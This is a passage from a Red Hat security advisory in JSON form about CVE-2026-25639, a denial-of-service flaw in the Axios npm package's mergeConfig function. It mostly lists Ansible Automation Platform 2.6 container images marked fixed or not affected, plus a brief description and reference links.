"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
